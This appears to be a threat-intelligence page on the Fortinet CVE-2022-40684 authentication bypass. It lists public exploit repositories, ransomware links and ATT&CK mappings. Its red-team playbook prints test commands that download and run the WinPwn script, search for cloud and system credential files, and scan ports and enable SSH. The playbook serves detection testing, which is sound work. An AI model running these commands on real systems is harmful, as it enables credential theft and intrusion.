CVE-2022-40684

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 18/10 Upd 12/01

Overview

This vulnerability is an authentication bypass affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager administrative interfaces. The root cause lies in improper validation of HTTP/HTTPS requests, allowing an attacker to exploit alternate request paths or channels to circumvent authentication controls. The flaw specifically impacts the handling of API endpoints related to administrative configuration.

Vulnerability Description

An authentication bypass using an alternate path or channel [CWE-288] in Fortinet FortiOS version 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, FortiProxy version 7.2.0 and version 7.0.0 through 7.0.6 and FortiSwitchManager version 7.2.0 and 7.0.0 allows an unauthenticated atttacker to perform operations on the administrative interface via specially crafted HTTP or HTTPS requests.

Impact

An unauthenticated attacker can exploit this vulnerability to gain unauthorized administrative access to affected devices. This access enables viewing and modifying sensitive configuration data, including administrative user settings, potentially leading to full system compromise. No prior authentication or user interaction is required, making exploitation straightforward and enabling attackers to control network security infrastructure, resulting in significant operational and data security risks.

Solution

Fortinet has released security updates addressing this authentication bypass in FortiOS, FortiProxy, and FortiSwitchManager. Users should upgrade to FortiOS versions later than 7.2.1 or 7.0.6, FortiProxy versions beyond 7.2.0 and 7.0.6, and FortiSwitchManager versions above 7.2.0 and 7.0.0 as specified in Fortinet's advisory FG-IR-22-377 (https://fortiguard.com/psirt/FG-IR-22-377). Administrators are advised to apply these patches promptly and review device configurations to ensure no unauthorized changes occurred prior to patching.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in Fortinet's FortiOS, FortiProxy, and FortiSwitchManager products represents a critical authentication bypass issue that allows unauthenticated attackers to exploit the administrative interfaces of these systems. This flaw arises from the improper validation of authentication tokens, enabling attackers to send specially crafted HTTP or HTTPS requests that can bypass security measures. The affected versions include FortiOS 7.2.0 through 7.2.1 and 7.0.0 through 7.0.6, as well as FortiProxy and FortiSwitchManager within the same version ranges. The severity of this vulnerability is underscored by its high CVSS score of 9.8, indicating that it poses a significant risk to organizations utilizing these products.

Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. By leveraging the authentication bypass, an attacker can gain unauthorized access to the administrative interfaces of the affected products. This could involve sending crafted requests that manipulate the underlying protocols, allowing the attacker to perform administrative functions without needing valid credentials. Scenarios may include altering configurations, accessing sensitive data, or even deploying malicious payloads that could further compromise the network. The simplicity of the attack, combined with the potential for significant control over critical network infrastructure, makes this vulnerability especially dangerous.

The real-world impact of this vulnerability can be profound for organizations that rely on Fortinet's products for their security infrastructure. An attacker gaining administrative access could lead to data breaches, service disruptions, and unauthorized changes to security policies, all of which could have severe financial and reputational repercussions. For businesses, the risk extends beyond immediate damage; regulatory compliance issues may arise if sensitive data is exposed or if the organization fails to protect its systems adequately. The potential for widespread exploitation means that organizations must take this threat seriously and act swiftly to mitigate the risks.

To detect and mitigate the threat posed by this vulnerability, organizations should implement a multi-layered security approach. Regularly updating and patching affected systems is crucial, as Fortinet has released updates to address this flaw. Additionally, monitoring network traffic for unusual patterns or unauthorized access attempts can help identify potential exploitation in real-time. Employing intrusion detection systems (IDS) and conducting regular security audits can further bolster defenses. Organizations should also consider implementing strict access controls and segmentation within their networks to limit the potential impact of an attacker gaining unauthorized access.

In conclusion, the authentication bypass vulnerability in Fortinet's products presents a significant threat to network security. Its ease of exploitation and potential for severe consequences necessitate immediate attention from organizations using these systems. By understanding the technical details, potential attack vectors, and real-world implications, as well as employing robust detection and mitigation strategies, organizations can better protect themselves against this critical vulnerability. Proactive measures and a commitment to security best practices will be essential in safeguarding against the risks associated with this and similar vulnerabilities in the future.




CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2022-40684, indicating continued exploitation attempts targeting Fortinet FortiOS, FortiProxy, and FortiSwitchManager. This uptick, while modest, underscores persistent adversary interest and operational use, particularly by ransomware groups such as Akira, which remain actively associated with campaigns leveraging this vulnerability. The availability of multiple new proof-of-concept exploits on public repositories has likely contributed to sustained attacker engagement, lowering the barrier for exploitation and facilitating broader targeting. Although the EPSS score remains high and stable, the incremental rise in detection signals that threat actors are maintaining or marginally expanding their operational tempo rather than diminishing activity. For defenders, this means that vigilance must be sustained as the vulnerability continues to be a viable vector for unauthorized administrative access and subsequent ransomware deployment. The threat level remains critical, with the evolving exploit landscape and ransomware associations reinforcing the urgency for ongoing monitoring and response readiness.



Update 2 — June 21, 2026

CSURFACE threat intelligence has identified a modest increase in exploitation attempts targeting CVE-2022-40684, reflected by a slight rise in detection signals and an elevated EPSS score nearing certainty of exploitation. This subtle uptick indicates sustained adversary interest, with threat actors continuing to leverage this critical authentication bypass vulnerability to gain unauthorized administrative access. The persistence of ransomware groups such as Akira in campaigns exploiting this flaw underscores the ongoing operational relevance of this vulnerability. Additionally, the emergence of multiple new proof-of-concept exploits circulating publicly enhances the accessibility of attack tools, potentially lowering the barrier for less sophisticated actors to conduct impactful intrusions. For defenders, this evolving landscape signals that the threat remains active and adaptive, necessitating continued vigilance. While the increase is not yet characterized as a rapid surge, the trend confirms that exploitation activity is stable or incrementally growing, maintaining the vulnerability’s critical risk profile and its role as a vector for ransomware deployment.



Update 3 — July 06, 2026

CSURFACE threat intelligence has identified a slight increase in exploitation attempts targeting CVE-2022-40684, consistent with a gradual upward trend in attacker activity. This subtle rise in telemetry correlates with continued dissemination of multiple new proof-of-concept exploits, which remain publicly accessible and contribute to lowering the technical barrier for threat actors. Notably, ransomware groups associated with this vulnerability, such as Akira, continue to leverage it as a reliable vector for initial access, underscoring the persistent operational value of this flaw. While the overall exploit landscape remains stable without signs of a rapid surge, the incremental growth in activity reinforces the vulnerability’s critical status and sustained attractiveness to adversaries. For defenders, this evolving pattern signals the necessity to maintain heightened monitoring and response capabilities, as the threat remains active and capable of facilitating impactful intrusions.

Affected Products (6)

Vendor Product Version CPE
fortinet Fortinet Fortiproxy All cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
fortinet Fortinet Fortiproxy 7.2.0 cpe:2.3:a:fortinet:fortiproxy:7.2.0:*:*:*:*:*:*:*
fortinet Fortinet Fortiswitchmanager 7.0.0 cpe:2.3:a:fortinet:fortiswitchmanager:7.0.0:*:*:*:*:*:*:*
fortinet Fortinet Fortiswitchmanager 7.2.0 cpe:2.3:a:fortinet:fortiswitchmanager:7.2.0:*:*:*:*:*:*:*
fortinet Fortinet Fortios All cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
fortinet Fortinet Fortios All cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Fortinet FortiOS, FortiProxy, and FortiSwitchManager authentication bypass.
exploits/linux/http/fortinet_authentication_bypass_cve_2022_40684
Heyder Andrade <@HeyderAndrade>, Zach Hanley <@hacks_zach> Unknown unix, linux View

ExploitDB (2)

Title Author Type Platform Date Link
Fortinet FortiOS_ FortiProxy_ and FortiSwitchManager 7.2.0 - Authentication bypass ub3rsick remote windows - View
FortiOS_ FortiProxy_ FortiSwitchManager v7.2.1 - Authentication Bypass Felipe Alcantara webapps multiple - View

GitHub PoCs (29)

Repository Author Stars Forks Date Link
horizon3ai/CVE-2022-40684
A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager
horizon3ai 356 90 2022-10-13 View
carlosevieira/CVE-2022-40684
PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)
carlosevieira 87 35 2022-10-13 View
arsolutioner/fortigate-belsen-leak
Research repository tracking affected IPs from the Fortigate CVE-2022-40684 configuration leak by Belsen Group
arsolutioner 86 21 2025-01-16 View
Filiplain/Fortinet-PoC-Auth-Bypass
Bash PoC for Fortinet Auth Bypass - CVE-2022-40684
Filiplain 16 4 2022-10-13 View
kljunowsky/CVE-2022-40684-POC
Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager
kljunowsky 16 2 2022-10-13 View
TaroballzChen/CVE-2022-40684-metasploit-scanner
An authentication bypass using an alternate path or channel in Fortinet product
TaroballzChen 14 3 2022-10-27 View
hughink/CVE-2022-40684
hughink 11 3 2022-10-28 View
HAWA771/CVE-2022-40684
Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ]
HAWA771 2 8 2022-10-15 View
qingsiweisan/CVE-2022-40684
qingsiweisan 9 0 2022-10-26 View
Chocapikk/CVE-2022-40684
Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ]
Chocapikk 7 1 2022-10-15 View
secunnix/CVE-2022-40684
secunnix 5 3 2022-10-14 View
z-bool/CVE-2022-40684
一键枚举所有用户名以及写入SSH公钥
z-bool 5 1 2023-02-27 View
und3sc0n0c1d0/CVE-2022-40684
Utilities for exploiting vulnerability CVE-2022-40684 (FortiOS / FortiProxy / FortiSwitchManager - Authentication bypass...
und3sc0n0c1d0 4 1 2022-10-19 View
xtwip/fortipwn
Forti CVE-2022-40684 enumeration script built in Rust
xtwip 4 0 2022-10-16 View
gustavorobertux/gotigate
Exploit Fortigate - CVE-2022-40684
gustavorobertux 2 0 2022-10-27 View
iveresk/CVE-2022-40684
iveresk 1 1 2022-10-14 View
jsongmax/Fortinet-CVE-2022-40684
jsongmax 2 0 2022-10-17 View
NeriaBasha/CVE-2022-40684
NeriaBasha 1 0 2022-10-16 View
dkstar11q/CVE-2022-40684
Exploit for CVE-2022-40684 vulnerability
dkstar11q 0 1 2023-01-28 View
ClickCyber/cve-2022-40684
exploit for CVE-2022-40684 Fortinet
ClickCyber 0 1 2022-10-15 View
XalfiE/Fortigate-Belsen-Leak-Dump-CVE-2022-40684-
XalfiE 1 0 2025-01-23 View
Anthony1500/CVE-2022-40684
Anthony1500 0 0 2023-09-14 View
Yami0x777/Belsen_Group-et-exploitation-de-la-CVE-2022-40684
Yami0x777 0 0 2025-02-10 View
puckiestyle/CVE-2022-40684
puckiestyle 0 0 2022-10-17 View
notareaperbutDR34P3r/CVE-2022-40684-Rust
notareaperbutDR34P3r 0 0 2023-01-17 View
pintukumar-sutradhar/fortigate-cve-2022-40684-tool
FortiGate CVE-2022-40684 assessment tool for user enumeration, configuration dump, and lab testing.
pintukumar-sutradhar 0 0 2026-04-01 View
mhd108/CVE-2022-40684
mhd108 0 0 2022-10-14 View
niklasmato/fortileak-01-2025-Be
This repository contains informaion about the Fortigate firewall vulnerability (CVE-2022-40684) and affected data that w...
niklasmato 0 0 2025-01-24 View
ccordeiro/CVE-2022-40684
PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)
ccordeiro 0 0 2025-11-19 View
Exploited in Wild CONFIRMED
Ransomware IN USE
Attacker Interest MEDIUM
Sightings Few sightings

Ransomware Groups 1

akira
CONFIRMED
1529 victims
ransomware.live
2026-06-25

Threat Feed

35 events
2026-07-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-25
Exploited by akira

Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-18
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-17
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-11
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-10
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-02
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-01
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-20
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-05-05
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-05
Exploited by akira

Ransomware group known to exploit this vulnerability. Tools: Advanced IP Scanner, Advanced Port Scanner, AnyDesk, Bloodhound, Cloudflared (1529 known victims)

2022-10-13
PoC Published (29 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2022-10-11
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2022-10-10
Exploit Published (2 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
100% auth_bypass
Privilege Escalation
35% privilege_escalation

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059 Command and Scripting Interpreter Kill Chain execution ESXi, IaaS, Identity Provider, Linux, macOS, Network Devices, Office Suite, Windows
T1542.001 System Firmware Kill Chain persistence, defense-evasion Windows, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1046 Network Service Discovery Kill Chain discovery Containers, IaaS, Linux, macOS, Network Devices, Windows
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-22 Exploiting Trust in Client
40%
High High
CAPEC-114 Authentication Abuse
30%
Medium
CAPEC-151 Identity Spoofing
30%
Medium Medium
CAPEC-194 Fake the Source of Data
30%
Medium
CAPEC-633 Token Impersonation
30%
Medium

Red Team Playbook

33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1046 Network Service Discovery for Containers containers Shell
Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and...
Command (Shell)
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
T1046 Port Scan Linux, macOS Bash
Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
Command (Bash)
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
T1046 Port Scan NMap for Windows Windows PowerShell Privileged
Scan ports to check for listening ports for the local host 127.0.0.1
Command (PowerShell)
nmap #{host_to_scan}
T1046 Port Scan Nmap Linux, macOS Shell Privileged
Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
Command (Shell)
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
T1046 Port Scan using nmap (Port range) Linux, macOS Shell Privileged
Scan multiple ports to check for listening ports with nmap
Command (Shell)
nmap -Pn -sV -p #{port_range} #{host}
T1046 Port Scan using python Windows PowerShell
Scan ports to check for listening ports with python
Command (PowerShell)
python "#{filename}" -i #{host_ip}
T1046 Port-Scanning /24 Subnet with PowerShell Windows PowerShell
Scanning common ports in a /24 subnet. If no IP address for the target subnet is specified the test tries to determine the attacking machine's "primary" IPv4 address first and then scans that address with a /24 netmask. The connection attempts to use a timeout parameter in...
Command (PowerShell)
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
    $ip_list = $ipAddr -split ","
    $ip_list = $ip_list.ForEach({ $_.Trim() })
    Write-Host "[i] IP Address List: $ip_list"

    $ports = #{port_list}

    foreach ($ip in $ip_list) {
        foreach ($port in $ports) {
            Write-Host "[i] Establishing connection to: $ip : $port"
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} elseif ($ipAddr -notlike "*,*") {
    if ($ipAddr -eq "") {
        # Assumes the "primary" interface is shown at the top
        $interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
        Write-Host "[i] Using Interface $interface"
        $ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
    }
    Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
    $subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
    # Always assumes /24 subnet
    Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"

    $ports = #{port_list}
    $subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }

    foreach ($ip in $subnetIPs) {
        foreach ($port in $ports) {
            try {
                $tcp = New-Object Net.Sockets.TcpClient
                $tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
            } catch {}
            if ($tcp.Connected) {
                $tcp.Close()
                Write-Host "Port $port is open on $ip"
            }
        }
    }
} else {
    Write-Host "[Error] Invalid Inputs"
    exit 1
}
T1046 Remote Desktop Services Discovery via PowerShell Windows PowerShell Privileged
Availability of remote desktop services can be checked using get- cmdlet of PowerShell
Command (PowerShell)
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
T1046 WinPwn - MS17-10 Windows PowerShell
Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
T1046 WinPwn - bluekeep Windows PowerShell
Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
T1046 WinPwn - fruit Windows PowerShell
Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
T1046 WinPwn - spoolvulnscan Windows PowerShell
Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
T1059 AutoIt Script Execution Windows PowerShell
An adversary may attempt to execute suspicious or malicious script using AutoIt software instead of regular terminal like powershell or cmd. Calculator will popup when the script is executed successfully.
Command (PowerShell)
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
T1542.001 UEFI Persistence via Wpbbin.exe File Creation Windows PowerShell Privileged
Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms. - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c -...
Command (PowerShell)
echo "Creating %systemroot%\wpbbin.exe"      
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (5)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2022-40684
fortiguard.com
GitHub CVE
https://fortiguard.com/psirt/FG-IR-22-377
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/169431/Fortinet-FortiOS-FortiProxy-FortiSwitchManager-Authentication-Bypass.html
packetstormsecurity.com
GitHub CVE
http://packetstormsecurity.com/files/171515/Fortinet-7.2.1-Authentication-Bypass.html
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-40684